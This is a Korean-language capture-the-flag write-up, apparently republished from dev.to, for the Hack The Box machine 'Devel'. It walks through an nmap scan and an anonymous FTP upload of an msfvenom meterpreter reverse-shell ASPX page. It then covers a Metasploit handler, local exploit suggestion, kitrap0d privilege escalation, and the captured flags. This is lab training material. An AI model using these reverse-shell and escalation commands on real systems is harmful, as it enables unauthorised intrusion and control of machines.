Hack The Box 개발용 글 작성
6828 단어 hackinghackthebox
전반적으로이 상자는 재미있었습니다. 정말 강력한 metasploit을 사용하여 더 많은 경험을 얻을 수 있었습니다. 저는 이 도구를 사용하는 스크립트 키디입니다.
엔맵 스캔
nmap 스캔을 시작해 봅시다.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 11:26 CDT
Nmap scan report for devel.htb (10.10.10.5)
Host is up (0.074s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.29 seconds
스캔 결과 Windows 상자에서 실행되는 FTP 서버와 웹 서버가 있음을 보여줍니다. 웹사이트에 표시되는 내용을 살펴보겠습니다.

기본 페이지가 있는 IIS 버전 7이 있는 것 같습니다. 익명으로 FTP 서버에 로그인할 수 있는지 봅시다.

익명 로그인은 잘 작동했습니다. 거기에 IIS 시작 페이지로 보이는 것을 포함하여 일부 파일이 있는 것 같습니다. 이것이 웹 디렉토리일까요?
해당 디렉터리에 파일을 업로드할 수 있는지 살펴보겠습니다.



예! 자, 이제 msfvenom을 사용하여 리버스 쉘을 얻기 위해 악용할 수 있는 페이지를 만들어 보겠습니다. 나는 세부 사항을 찾기 위해 이것을 봤다.

첫 번째 링크는 내가 필요한 것을 제공했습니다. LHOST를 시스템의 IP로 바꾸십시오.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.26 LPORT=1234 -f aspx -o shell.aspx

이제 ftp를 통해 웹사이트에 업로드할 스크립트가 있습니다. 이것은 우리에게 리버스 쉘을 제공해야 합니다. 먼저 리버스 쉘을 캡처할 수 있도록 metasploit을 시작합니다.

다음을 사용하는 것이 좋습니다.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.26
set LPORT 1234
exploit
VPN에서 컴퓨터를 가리키도록 LHOST를 변경해야 합니다.

그것은 당신에게 상자에 껍질을 가져다 줄 것입니다.
getuid를 실행하면 우리가 IIS APPOOL\Web 사용자임을 알 수 있습니다. 우리는 루트를 원하므로 할 일이 더 많습니다.
셸로 이동하여 systeminfo를 사용하여 익스플로잇을 찾을 수 있는지 살펴보겠습니다.

이제 우리는 셸을 종료하고 meterpreter 세션을 백그라운드로 전환하고 익스플로잇 조사를 수행해야 합니다.
exit
background
use post/multi/recon/local_exploit_suggester
set session 1
run

올바르게 수행했다면 사용할 수 있는 노출 목록이 표시됩니다. 나는 이것들 중 어느 것이 가장 좋은지 알아보기 위해 구글링을 해야 했다. 권장 사항은 목록에서 두 번째인 kitrap0d를 사용하는 것이었습니다.
use exploit/windows/local/ms10_015_kitrap0d
show options
어떤 세션에서 실행할지, 로컬 호스트 IP 및 로컬 호스트 포트를 모듈에 알려야 합니다.
set sessions 1
set LHOST 10.10.14.26
set LPORT 1234
run

나는 처음에 장난을 치고 세션을 그만 두었습니다. 나는 그것을 추가했고 익스플로잇이 작동했습니다.

모든 작업을 올바르게 수행했다면 미터프리터 프롬프트로 돌아와야 합니다. whoami를 실행하면 다음이 표시됩니다.

좋아, 우리는 이 상자를 소유하고 있다. user.txt와 root.txt를 가져옵니다. 처음에는 사용할 Windows 명령을 기억하는 데 약간의 문제가 있었습니다. 나는 결국 그것을 알아 냈습니다.


사용자 플래그:
9ecdd6a3aedf24b41562fea70f4cb3e8
루트 플래그는 다음과 같습니다.
e621a0b5041708797c4fc4728bc72b4b
이 상자는 꽤 쉬웠습니다. Metasploit을 사용하면 익스플로잇을 매우 쉽게 찾을 수 있습니다. 어떤 모듈과 옵션을 파악하는 것이 가장 어려운 부분입니다. 여기서 Google은 당신의 친구입니다. 이 상자에는 추가 도움을 위해 사용할 수 있는 많은 연습이 있습니다.
이 상자는 매우 재미있었습니다. 저같은 초심자에게 추천하고 싶습니다.
Reference
이 문제에 관하여(Hack The Box 개발용 글 작성), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://dev.to/joshkerr/hack-the-box-write-up-for-devel-4dm2텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념
(Collection and Share based on the CC Protocol.)